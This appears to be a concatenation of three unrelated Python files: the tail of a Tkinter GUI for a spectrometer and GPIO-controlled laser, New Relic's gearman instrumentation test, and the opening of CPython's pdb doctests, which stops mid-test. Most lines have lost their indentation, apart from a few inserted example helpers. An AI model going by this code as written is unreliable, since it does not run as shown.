spectra_plot.set_title('Observed Emission Spectra')
emission_data = pd.DataFrame(data=None, columns=['Wavelength [nm]', 'Intensity'])
def update_plot(): # take a fresh sample from source
global spec_range
global spec_intensity
global emission_data
dark_spec = pd.DataFrame(data=None, columns=['Wavelength [nm]', 'Intensity'])
if not devices:
ref = messagebox.askyesno('ERROR', "Error: No device detected. \nUse Testing Data?")
if ref: # refresh with sample data
emission_data = generate_dummy_spectra(central_spectra=(random.randint(300, 500), random.randint(500, 700),
random.randint(700, 900)))
spectra_plot.clear()
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
spectra_plot.set_title('Observed Emission Spectra')
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
canvas.draw()
else:
spec.trigger_mode(trigger_mode) # set trigger mode
spec.integration_time_micros(int_time) # set integration_time
emission_data = \
pd.DataFrame(data=np.asarray([spec.wavelengths(), spec.intensities(correct_dark_counts = (dark_count_var.get() == 1))]).transpose(),
columns=['Wavelength [nm]', 'Intensity'])
# filter out readings below 300 nm (elementwise mask: values <= 300 in either column become NaN)
emission_data = emission_data[emission_data > 300]
# update plot
spectra_plot.clear()
spectra_plot.set_ylabel('Intensity')
spectra_plot.set_xlabel('Wavelength [nm]')
spectra_plot.set_title('Observed Emission Spectra')
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
canvas.draw()
# update settings bar
pixel_var.set(spec.pixels)
integration_limits_var.set(spec.integration_time_micros_limits)
max_intensity_var.set(emission_data['Intensity'].max())
def reconnect_device():
global spec
if seabreeze.spectrometers.list_devices():
spec = seabreeze.spectrometers.Spectrometer.from_first_available()
device_name.set(spec.serial_number)
else:
messagebox.showerror("ERROR", "ERROR: No Device Detected")
def save_settings():
pass
def load_settings():
pass
def export_plot():
name = filedialog.asksaveasfilename(initialdir="./",
title="Select file",
filetypes=(("PNG", "*.png"), ("all files", "*.*")),
defaultextension='.p')
if name and name != '.p':
fig.savefig(name)
def export_csv():
global emission_data
try:
name = filedialog.asksaveasfilename(initialdir="./",
title="Select file",
filetypes=(("CSV data", "*.csv"), ("all files", "*.*")),
defaultextension='.csv')
if name:
emission_data.to_csv(name, index=None, header=True)
else:
pass
except ValueError:
pass
# Laser code __________________________________________________________________________________________________________
laser_on = False
def laser_switch():
global laser_on
if not laser_on:
GPIO.output(interface_config.Laser_GPIO_pin, GPIO.LOW) # set pin LOW to disable 48V converter, and thus the laser
laser_onoff_switch['text'] = "Turn on laser"
if laser_on:
GPIO.output(interface_config.Laser_GPIO_pin, GPIO.HIGH) # set pin HIGH to enable the 48V converter, and thus the laser
laser_onoff_switch['text'] = "Turn off laser"
laser_on = not laser_on
def editConstants():
pulseMode = 0
if pulse_mode.get() == "Continuous":
pulseMode = 0
elif pulse_mode.get() == "Single Shot":
pulseMode = 1
elif pulse_mode.get() == "Burst":
pulseMode = 2
powerMode = 0
if power_mode.get() == 'Manual':
powerMode = 0
elif power_mode.get() == 'Low Power':
powerMode = 1
elif power_mode.get() == 'High Power':
powerMode = 2
diodeTrigger = 0
if diode_trigger_var.get() == 'Internal':
diodeTrigger = 0
elif diode_trigger_var.get() == 'External':
diodeTrigger = 1
laser.editConstants(pulseMode, rep_rate_control.get(), burst_count_var.get(), diode_current_var.get(), powerMode,
pulse_width_var.get(), diodeTrigger)
def arm_laser():
editConstants()
if laser.check_armed():
laser.disarm()
else:
laser.arm()
def fire_laser():
if sync_fire_var.get() == 1:
threading.Thread(target=update_plot).start()
time.sleep(.001)
laser.fire_laser()
def emergency_stop():
laser.emergency_stop()
def acquireData():
while True:
status_var.set(str(laser.get_status()))
fet_temp_var.set(str(laser.fet_temp_check()))
fet_voltage_var.set(str(laser.fet_voltage_check()))
diode_current_measurement_var.set(str(laser.diode_current_check()))
resonator_temp_var.set(str(laser.resonator_temp_check()))
time.sleep(.01)
threading.Thread(target = acquireData).start()
# Spectrometer UI ______________________________________________________________________________________________________
if not devices:
spectra_plot.plot(0, 0)
else:
spec = seabreeze.spectrometers.Spectrometer.from_first_available()
emission_data = \
pd.DataFrame(data=np.asarray([spec.wavelengths(), spec.intensities()]).transpose(),
columns=['Wavelength [nm]', 'Intensity'])
spectra_plot.plot(emission_data.iloc[0:, 0], emission_data.iloc[0:, 1])
device_name.set(spec.serial_number)
canvas = FigureCanvasTkAgg(fig, master=root)
canvas.get_tk_widget().grid(row=1, column=0, columnspan=2, rowspan=16) # plot initial data
tk.Label(root, text="Connected Device:").grid(row=0, column=0)
tk.Label(root, textvariable=device_name, bg="White", relief=tk.GROOVE).grid(row=0, column=1, sticky="NSEW")
reconnect = tk.Button(root, text="Reconnect Device", command=reconnect_device)
reconnect.grid(row=0, column=2, columnspan=2, sticky="NSEW")
reconnect.config(state=tk.DISABLED)
tk.Label(text="Sampling Controls", relief=tk.GROOVE).grid(row=1, columnspan=2, column=2, sticky="NSEW")
tk.Label(root, text="Integration Time [μs]", relief=tk.GROOVE).grid(row=2, column=2, sticky="NSEW")
int_entry = tk.Entry(textvariable=int_time_entry, relief=tk.FLAT, bg="white")
int_entry.grid(row=2, column=3, sticky="NSEW")
tk.Label(root, text="Trigger Mode", relief=tk.GROOVE).grid(row=3, column=2, sticky="NSEW")
trigger_entry = tk.Entry(root, textvariable=trigger_mode_entry, relief=tk.FLAT, bg="white")
trigger_entry.grid(row=3, column=3, sticky="NSEW")
tk.Checkbutton(root, text="Dark Spectra Subtraction", variable=dark_count_var, relief=tk.FLAT)\
.grid(row=4, column=2, sticky="NSEW")
tk.Checkbutton(root, text="Synchronize Laser", variable=sync_fire_var, relief=tk.FLAT)\
.grid(row=4, column=3, sticky="NSEW")
refresh = tk.Button(root, text="Acquire Sample", command=update_plot)
refresh.grid(row=5, column=2, columnspan=2, sticky="NSEW")
tk.Label(root, text="Current Status", relief=tk.GROOVE).grid(row=6, column=2, columnspan=2, sticky="NSEW")
tk.Label(root, text="Max Intensity", relief=tk.GROOVE).grid(row=7, column=2, sticky="NSEW")
tk.Label(root, textvariable=max_intensity_var, bg='gray', relief=tk.FLAT).grid(row=7, column=3, sticky="NSEW")
tk.Label(root, text="Integration Bounds", relief=tk.GROOVE).grid(row=8, column=2, sticky="NSEW")
tk.Label(root, textvariable=integration_limits_var, bg='gray', relief=tk.FLAT).grid(row=8, column=3, sticky="NSEW")
tk.Label(root, text="Pixel Count", relief=tk.GROOVE).grid(row=9, column=2, sticky="NSEW")
tk.Label(root, textvariable=pixel_var, bg='gray', relief=tk.FLAT).grid(row=9, column=3, sticky="NSEW")
tk.Label(root, text="Sample Count", relief=tk.GROOVE).grid(row=10, column=2, sticky="NSEW")
tk.Label(root, textvariable=sample_var, bg='gray', relief=tk.FLAT).grid(row=10, column=3, sticky="NSEW")
img_button = tk.Button(root, text='Export Image', command=export_plot)
img_button.grid(row=11, column=2, columnspan=2, sticky="NSEW")
csv_button = tk.Button(root, text='Export CSV', command=export_csv)
csv_button.grid(row=12, column=2, columnspan=2, sticky="NSEW")
# laser control UI______________________________________________________________________________________________________
tk.Button(root, text=" ", state=tk.DISABLED).grid(row=0, column=4, rowspan=18, sticky="NSEW") # divider
tk.Label(root, text="Laser Controls", relief=tk.FLAT).grid(row=0, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Pulse Control", relief=tk.GROOVE).grid(row=1, columnspan=2, column=5, sticky="NSEW")
tk.Label(text="Pulse Mode", relief=tk.GROOVE).grid(row=2, column=5, sticky="NSEW")
tk.OptionMenu(root, pulse_mode, *pulse_options).grid(row=2, column=6, sticky="NSEW")
tk.Label(text="Rep Rate", relief=tk.GROOVE).grid(row=3, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=rep_rate_control).grid(row=3, column=6, sticky="NSEW")
tk.Label(text="Burst Count", relief=tk.GROOVE).grid(row=4, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=burst_count_var).grid(row=4, column=6, sticky="NSEW")
tk.Label(text="Diode Settings", relief=tk.GROOVE).grid(row=5, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Diode Current", relief=tk.GROOVE).grid(row=6, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=diode_current_var).grid(row=6, column=6, sticky="NSEW")
tk.Label(text="Energy Mode", relief=tk.GROOVE).grid(row=7, column=5, sticky="NSEW")
tk.OptionMenu(root, power_mode, *power_options).grid(row=7, column=6, sticky="NSEW")
tk.Label(text="Diode Pulse Width", relief=tk.GROOVE).grid(row=8, column=5, sticky="NSEW")
tk.Entry(relief=tk.FLAT, bg="white", textvariable=pulse_width_var).grid(row=8, column=6, sticky="NSEW")
tk.Label(text="Diode Trigger", relief=tk.GROOVE).grid(row=9, column=5, sticky="NSEW")
tk.OptionMenu(root, diode_trigger_var, *diode_trigger_options).grid(row=9, column=6, sticky="NSEW")
# tk.OptionMenu(root, diode_trigger_var, *diode_trigger_options).grid(row=9, column=6, sticky="NSEW")
tk.Label(text="Laser Controls", relief=tk.GROOVE).grid(row=10, column=5, columnspan=2, sticky="NSEW")
tk.Label(text="Arm Laser", relief=tk.GROOVE).grid(row=11, column=5, sticky="NSEW")
arm = tk.Button(text='Arm', command = arm_laser)
arm.grid(row=11, column=6, sticky="NSEW")
tk.Label(text="Laser Status", relief=tk.GROOVE).grid(row=12, column=5, sticky="NSEW")
laser_status = tk.Label(textvariable=status_var, relief=tk.FLAT, bg='gray')
laser_status.grid(row=12, column=6, sticky="NSEW")
edit_constants = tk.Button(text = "Edit constants", command = editConstants)
edit_constants.grid(row=13, column=5, columnspan=2, rowspan=7, sticky="NSEW")
laser_onoff_switch = tk.Button(text='Turn on laser', bg='red', command = laser_switch)
laser_onoff_switch.grid(row=11, column=7, columnspan=2, rowspan=2, sticky="NSEW")
emergency_stop_control = tk.Button(text='Stop fire', bg='red', command = emergency_stop)
emergency_stop_control.grid(row=13, column=7, columnspan=2, rowspan=1, sticky="NSEW")
fire_control = tk.Button(text='Fire', bg='red', command = fire_laser)
fire_control.grid(row=14, column=7, columnspan=2, rowspan=1, sticky="NSEW")
tk.Label(root, text="Laser Status", relief=tk.FLAT).grid(row=0, column=7, columnspan=2, sticky="NSEW")
tk.Label(root, text="Thermals", relief=tk.GROOVE).grid(row=1, column=7, columnspan=2, sticky="NSEW")
tk.Label(root, text="Resonator [°C]", relief=tk.GROOVE).grid(row=2, column=7, sticky="NSEW")
tk.Label(root, textvariable=resonator_temp_var, bg="Gray", relief=tk.FLAT).grid(row=2, column=8, sticky="NSEW")
tk.Label(root, text="FET [°C]", relief=tk.GROOVE).grid(row=3, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_temp_var, bg="Gray", relief=tk.FLAT).grid(row=3, column=8, sticky="NSEW")
"""
Heaters are not used
heater_target_var = tk.StringVar()
heater_target_var.set('N/A')
tk.Label(root, text="Heater Target [°C]", relief=tk.GROOVE).grid(row=4, column=7, sticky="NSEW")
tk.Label(root, textvariable=heater_target_var, bg="Gray", relief=tk.FLAT).grid(row=4, column=8, sticky="NSEW")
heater_temp_var = tk.StringVar()
heater_temp_var.set('N/A')
tk.Label(root, text="Heater Temp", relief=tk.GROOVE).grid(row=5, column=7, sticky="NSEW")
tk.Label(root, textvariable=heater_temp_var, bg="Gray", relief=tk.FLAT).grid(row=5, column=8, sticky="NSEW")
"""
tk.Label(root, text="Voltage", relief=tk.GROOVE).grid(row=4, column=7, columnspan=2, sticky="NSEW")
# Unused
tk.Label(root, text="Bank Voltage", relief=tk.GROOVE).grid(row=5, column=7, sticky="NSEW")
tk.Label(root, textvariable=bank_voltage_var, bg="Gray", relief=tk.FLAT).grid(row=5, column=8, sticky="NSEW")
# Unused
tk.Label(root, text="Target Bank Voltage", relief=tk.GROOVE).grid(row=6, column=7, sticky="NSEW")
tk.Label(root, textvariable=bank_target_var, bg="Gray", relief=tk.FLAT).grid(row=6, column=8, sticky="NSEW")
tk.Label(root, text="FET Voltage", relief=tk.GROOVE).grid(row=7, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_voltage_var, bg="Gray", relief=tk.FLAT).grid(row=7, column=8, sticky="NSEW")
tk.Label(root, text="Diode Current", relief=tk.GROOVE).grid(row=8, column=7, sticky="NSEW")
tk.Label(root, textvariable=diode_current_measurement_var, bg="Gray", relief=tk.FLAT).grid(row=8, column=8, sticky="NSEW")
# Unused
fet_drain_var = tk.StringVar()
fet_drain_var.set('N/A')
tk.Label(root, text="FET Drain", relief=tk.GROOVE).grid(row=9, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_drain_var, bg="Gray", relief=tk.FLAT).grid(row=9, column=8, sticky="NSEW")
# Unused
tk.Label(root, text="FET Source", relief=tk.GROOVE).grid(row=10, column=7, sticky="NSEW")
tk.Label(root, textvariable=fet_src_var, bg="Gray", relief=tk.FLAT, width=10).grid(row=10, column=8, sticky="NSEW")
def update_integration_time(a, b, c):
global int_time
    # Check the entry's current text, not the StringVar object (always truthy).
    if not int_time_entry.get():
int_entry.config(bg='red')
else:
try:
t = int(int_time_entry.get())
if t:
int_time = t
int_entry.config(bg="white")
else:
int_entry.config(bg="red")
except ValueError:
int_entry.config(bg="red")
def update_trigger_mode(a, b, c):
global trigger_mode
    # Check the entry's current text, not the StringVar object (always truthy).
    if not trigger_mode_entry.get():
trigger_entry.config(bg='red')
else:
try:
t = int(trigger_mode_entry.get())
if t in range(0, 4):
trigger_mode = t
trigger_entry.config(bg='white')
else:
trigger_entry.config(bg='red')
except ValueError:
trigger_entry.config(bg='red')
trigger_mode_entry.trace_variable('w', update_trigger_mode)
int_time_entry.trace_variable('w', update_integration_time)
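# Illustrative sketch (not part of the original GUI): the two trace callbacks
# above follow a common Tkinter pattern -- trace a StringVar on write and
# re-colour the associated Entry when its text fails validation. The helper
# below shows the same idea in a reusable form; it only touches the widget and
# variable objects passed in, and it is defined here as an example only and
# never called by this script.
def _attach_int_validation(entry_widget, string_var, valid=lambda v: v > 0):
    """Turn entry_widget red whenever string_var does not hold a valid int."""
    def _on_write(*_):
        try:
            value = int(string_var.get())
            entry_widget.config(bg="white" if valid(value) else "red")
        except ValueError:
            entry_widget.config(bg="red")
    string_var.trace_variable('w', _on_write)
    return _on_write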
update_plot()
root.mainloop()
|
test_gearman.py
|
# Copyright 2010 New Relic, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import threading
import gearman
from newrelic.api.background_task import background_task
worker_thread = None
worker_event = threading.Event()
gm_client = None
GEARMAND_HOST = os.environ.get("GEARMAND_PORT_4730_TCP_ADDR", "localhost")
GEARMAND_PORT = os.environ.get("GEARMAND_PORT_4730_TCP_PORT", "4730")
GEARMAND_ADDR = "%s:%s" % (GEARMAND_HOST, GEARMAND_PORT)
class GearmanWorker(gearman.GearmanWorker):
def after_poll(self, any_activity):
try:
worker_event_set = worker_event.is_set()
except TypeError:
worker_event_set = worker_event.isSet()
return not worker_event_set
def setup_module(module):
global worker_thread
gm_worker = GearmanWorker([GEARMAND_ADDR])
def task_listener_reverse(gearman_worker, gearman_job):
return "".join(reversed(gearman_job.data))
def task_listener_exception(gearman_worker, gearman_job):
raise RuntimeError("error")
gm_worker.set_client_id("gearman-instrumentation-tests")
gm_worker.register_task("reverse", task_listener_reverse)
gm_worker.register_task("exception", task_listener_exception)
def startup():
gm_worker.work(poll_timeout=1.0)
worker_thread = threading.Thread(target=startup)
worker_thread.start()
global gm_client
gm_client = gearman.GearmanClient([GEARMAND_ADDR])
def teardown_module(module):
worker_event.set()
worker_thread.join()
@background_task()
def test_successful():
completed_job_request = gm_client.submit_job("reverse", "data")
assert completed_job_request.complete
@background_task()
def test_exception():
completed_job_request = gm_client.submit_job("exception", "data")
assert completed_job_request.complete
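# Illustrative sketch (not part of the original test module): a round trip
# through the "reverse" task registered in setup_module(), reusing only the
# gm_client created above. That GearmanJobRequest exposes a `result` attribute
# is an assumption based on python-gearman 2.x; this helper is an example and
# is neither collected nor called by the test suite.
def _example_reverse_roundtrip():
    request = gm_client.submit_job("reverse", "data")
    return request.complete and request.result == "atad"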
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import unittest
import subprocess
import textwrap
from contextlib import ExitStack
from io import StringIO
from test import support
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[2]>(18)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) continue
BAZ
"""
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> from bdb import Breakpoint
>>> Breakpoint.next = 1
>>> Breakpoint.bplist = {}
>>> Breakpoint.bpbynumber = [None]
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
3 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) clear 3
Deleted breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
1 breakpoint keep no at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
stop only if 1 < 2
ignore next 10 hits
2 breakpoint keep yes at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) condition 1
Breakpoint 1 is now unconditional.
(Pdb) enable 1
Enabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) clear 1
Deleted breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) commands 2
(com) p "42"
(com) print("42", 7*6)
(com) end
(Pdb) continue
1
'42'
42 42
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(4)test_function()
-> print(2)
(Pdb) clear
Clear all breaks? y
Deleted breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) tbreak 5
Breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
(Pdb) continue
2
Deleted breakpoint 4 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:5
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(5)test_function()
-> print(3)
(Pdb) break
(Pdb) continue
3
4
"""
def do_nothing():
pass
def do_something():
print(42)
def test_list_commands():
"""Test the list and source commands of pdb.
>>> def test_function_2(foo):
... import test.test_pdb
... test.test_pdb.do_nothing()
... 'some...'
... 'more...'
... 'code...'
... 'to...'
... 'make...'
... 'a...'
... 'long...'
... 'listing...'
... 'useful...'
... '...'
... '...'
... return foo
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'list', # list first function
... 'step', # step into second function
... 'list', # list second function
... 'list', # continue listing to EOF
... 'list 1,3', # list specific lines
... 'list x', # invalid argument
... 'next', # step to import
... 'next', # step over import
... 'step', # step into do_nothing
... 'longlist', # list all lines
... 'source do_something', # list all lines of function
    ...     'source fooxxx',      # something that doesn't exist
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_list_commands[1]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> ret = test_function_2('baz')
[EOF]
(Pdb) step
--Call--
> <doctest test.test_pdb.test_list_commands[0]>(1)test_function_2()
-> def test_function_2(foo):
(Pdb) list
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
4 'some...'
5 'more...'
6 'code...'
7 'to...'
8 'make...'
9 'a...'
10 'long...'
11 'listing...'
(Pdb) list
12 'useful...'
13 '...'
14 '...'
15 return foo
[EOF]
(Pdb) list 1,3
1 -> def test_function_2(foo):
2 import test.test_pdb
3 test.test_pdb.do_nothing()
(Pdb) list x
*** ...
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(2)test_function_2()
-> import test.test_pdb
(Pdb) next
> <doctest test.test_pdb.test_list_commands[0]>(3)test_function_2()
-> test.test_pdb.do_nothing()
(Pdb) step
--Call--
> ...test_pdb.py(...)do_nothing()
-> def do_nothing():
(Pdb) longlist
... -> def do_nothing():
... pass
(Pdb) source do_something
... def do_something():
... print(42)
(Pdb) source fooxxx
*** ...
(Pdb) continue
"""
def test_post_mortem():
"""Test post mortem traceback debugging.
>>> def test_function_2():
... try:
... 1/0
... finally:
... print('Exception!')
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... test_function_2()
... print('Not reached.')
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'next', # step over exception-raising call
... 'bt', # get a backtrace
... 'list', # list code of test_function()
... 'down', # step into test_function_2()
... 'list', # list code of test_function_2()
... 'continue',
... ]):
... try:
... test_function()
... except ZeroDivisionError:
... print('Correctly reraised.')
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) next
Exception!
ZeroDivisionError: division by zero
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
(Pdb) bt
...
<doctest test.test_pdb.test_post_mortem[2]>(10)<module>()
-> test_function()
> <doctest test.test_pdb.test_post_mortem[1]>(3)test_function()
-> test_function_2()
<doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function():
2 import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
3 -> test_function_2()
4 print('Not reached.')
[EOF]
(Pdb) down
> <doctest test.test_pdb.test_post_mortem[0]>(3)test_function_2()
-> 1/0
(Pdb) list
1 def test_function_2():
2 try:
3 >> 1/0
4 finally:
5 -> print('Exception!')
[EOF]
(Pdb) continue
Correctly reraised.
"""
def test_pdb_skip_modules():
"""This illustrates the simple case of module skipping.
>>> def skip_module():
... import string
... import pdb; pdb.Pdb(skip=['stri*'], nosigint=True, readrc=False).set_trace()
... string.capwords('FOO')
>>> with PdbTestInput([
... 'step',
... 'continue',
... ]):
... skip_module()
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()
-> string.capwords('FOO')
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules[0]>(4)skip_module()->None
-> string.capwords('FOO')
(Pdb) continue
"""
# Module for testing skipping of module that makes a callback
mod = types.ModuleType('module_to_skip')
exec('def foo_pony(callback): x = 1; callback(); return None', mod.__dict__)
def test_pdb_skip_modules_with_callback():
"""This illustrates skipping of modules that call into other code.
>>> def skip_module():
... def callback():
... return None
... import pdb; pdb.Pdb(skip=['module_to_skip*'], nosigint=True, readrc=False).set_trace()
... mod.foo_pony(callback)
>>> with PdbTestInput([
... 'step',
... 'step',
... 'step',
... 'step',
... 'step',
... 'continue',
... ]):
... skip_module()
... pass # provides something to "step" to
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()
-> mod.foo_pony(callback)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(2)callback()
-> def callback():
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(3)callback()->None
-> return None
(Pdb) step
--Return--
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[0]>(5)skip_module()->None
-> mod.foo_pony(callback)
(Pdb) step
> <doctest test.test_pdb.test_pdb_skip_modules_with_callback[1]>(10)<module>()
-> pass # provides something to "step" to
(Pdb) continue
"""
def test_pdb_continue_in_bottomframe():
"""Test that "continue" and "next" work properly in bottom frame (issue #5294).
>>> def test_function():
... import pdb, sys; inst = pdb.Pdb(nosigint=True, readrc=False)
... inst.set_trace()
... inst.botframe = sys._getframe() # hackery to get the right botframe
... print(1)
... print(2)
... print(3)
... print(4)
>>> with PdbTestInput([ # doctest: +ELLIPSIS
... 'next',
... 'break 7',
